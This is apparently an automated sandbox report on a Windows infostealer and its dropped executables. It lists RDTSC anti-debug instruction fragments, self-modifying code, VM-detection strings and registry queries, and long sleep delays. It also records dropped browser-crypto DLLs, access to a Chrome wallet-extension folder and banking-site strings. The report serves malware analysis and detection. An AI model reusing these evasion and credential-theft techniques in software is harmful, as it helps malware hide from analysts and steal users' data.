                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6FF1B second address: F6FF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6FF1F second address: F6FF6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jmp 00007F91E8D54022h 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F91E8D54024h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jo 00007F91E8D5402Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F91E8D5401Eh 0x00000027 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EC524F second address: EC5269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F91E851B8E0h 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EC5269 second address: EC526F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EC5410 second address: EC5419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EDF37B second address: EDF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EDF37F second address: EDF38E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91E851B8D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EDF38E second address: EDF394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EDE5FD second address: EDE603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EDE73A second address: EDE753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F91E8D5401Ch 0x0000000b je 00007F91E8D5401Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EDEE48 second address: EDEE74 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91E851B8D8h 0x00000008 pushad 0x00000009 jo 00007F91E851B8D6h 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007F91E851B8D6h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c je 00007F91E851B8D6h 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 popad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EE4F97 second address: EE4FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F91E8D54016h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EE8238 second address: EE8242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F91E851B8D6h 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EE8242 second address: EE824D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: EE824D second address: EE8253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BA0D98 second address: 4BA0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BA0DA7 second address: 4BA0DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F91E851B8DAh 0x00000013 or esi, 67A9A8A8h 0x00000019 jmp 00007F91E851B8DBh 0x0000001e popfd 0x0000001f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BA0DE5 second address: 4BA0E7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F91E8D54022h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F91E8D5401Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F91E8D54024h 0x0000001d or ax, D098h 0x00000022 jmp 00007F91E8D5401Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F91E8D54028h 0x0000002e sub esi, 4C2D7AF8h 0x00000034 jmp 00007F91E8D5401Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov bh, 18h 0x00000042 push esi 0x00000043 pop edx 0x00000044 popad 0x00000045 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BA0E7E second address: 4BA0E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov dh, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, 1887D87Ah 0x00000014 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B90D56 second address: 4B90D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F91E8D54029h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B90D86 second address: 4B90D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B90D8A second address: 4B90D9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B90D9D second address: 4B90DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F91E851B8DDh 0x00000012 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B90DCB second address: 4B90DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E8D5401Ch 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0E94 second address: 4BD0EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E851B8E4h 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0EAC second address: 4BD0EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0EB0 second address: 4BD0EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F91E851B8DCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F91E851B8E0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 35E595A0h 0x00000020 jmp 00007F91E851B8E9h 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0EFC second address: 4BD0F18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0F18 second address: 4BD0F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0F1C second address: 4BD0F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4BD0F20 second address: 4BD0F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B70121 second address: 4B70125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B70125 second address: 4B7012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B7012B second address: 4B70193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F91E8D54026h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F91E8D5401Bh 0x0000000f sub eax, 7102B99Eh 0x00000015 jmp 00007F91E8D54029h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esp], ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F91E8D54028h 0x0000002a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B70193 second address: 4B70197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B70197 second address: 4B7019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B7019D second address: 4B701C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F91E851B8DCh 0x00000009 add cx, FDF8h 0x0000000e jmp 00007F91E851B8DBh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: 4B701C0 second address: 4B701D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91E8D5401Bh 0x00000010 rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\userGDHIIIIEHC.exeSpecial instruction interceptor: First address: DF0975 instructions caused by: Self-modifying code
                          Source: C:\Users\userGDHIIIIEHC.exeSpecial instruction interceptor: First address: C4C342 instructions caused by: Self-modifying code
                          Source: C:\Users\userGDHIIIIEHC.exeSpecial instruction interceptor: First address: E1BE9A instructions caused by: Self-modifying code
                          Source: C:\Users\userGDHIIIIEHC.exeSpecial instruction interceptor: First address: DFAF88 instructions caused by: Self-modifying code
                          Source: C:\Users\userGDHIIIIEHC.exeSpecial instruction interceptor: First address: C4EAAD instructions caused by: Self-modifying code
                          Source: C:\Users\userGDHIIIIEHC.exeSpecial instruction interceptor: First address: E76A41 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSpecial instruction interceptor: First address: DBEA41 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSpecial instruction interceptor: First address: F92C80 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSpecial instruction interceptor: First address: F6F78B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: CC0975 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: B1C342 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: CEBE9A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: CCAF88 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: B1EAAD instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: D46A41 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 70EA41 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 8E2C80 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 8BF78B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\userGDHIIIIEHC.exeCode function: 6_2_04BF02B6 rdtsc 6_2_04BF02B6
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 3379
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 396
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 5270
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1053
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1092
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1102
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 432
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1075
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1087
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeAPI coverage: 7.4 %
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6408Thread sleep count: 58 > 30
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6408Thread sleep time: -116058s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6708Thread sleep count: 56 > 30
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6708Thread sleep time: -112056s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5072Thread sleep count: 62 > 30
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5072Thread sleep time: -124062s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6728Thread sleep count: 3379 > 30
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 6728Thread sleep time: -6761379s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5552Thread sleep count: 396 > 30
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 5552Thread sleep time: -11880000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 4488Thread sleep time: -360000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 768Thread sleep count: 5270 > 30
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 768Thread sleep time: -10545270s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2136Thread sleep count: 1053 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2136Thread sleep time: -2107053s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3052Thread sleep count: 1092 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3052Thread sleep time: -2185092s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1584Thread sleep count: 1102 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1584Thread sleep time: -2205102s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6508Thread sleep count: 432 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6508Thread sleep time: -12960000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2580Thread sleep count: 1075 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2580Thread sleep time: -2151075s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7632Thread sleep time: -720000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3320Thread sleep count: 1087 > 30
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3320Thread sleep time: -2175087s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\userGDHIIIIEHC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040D8C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F4F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BCB0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004139B0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E270
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004143F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DC50
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,0_2_00414050
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EB60
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004133C0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: file.exe, 00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware;t\L
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: userGDHIIIIEHC.exe, userGDHIIIIEHC.exe, 00000006.00000002.2650632272.0000000000DD1000.00000040.00000001.01000000.00000009.sdmp, RoamingCBGCBGCAFI.exe, RoamingCBGCBGCAFI.exe, 00000017.00000002.2672454678.0000000000F47000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000002A.00000002.2667292642.0000000000CA1000.00000040.00000001.01000000.00000018.sdmp, axplong.exe, 0000002B.00000002.2696738994.0000000000897000.00000040.00000001.01000000.00000019.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
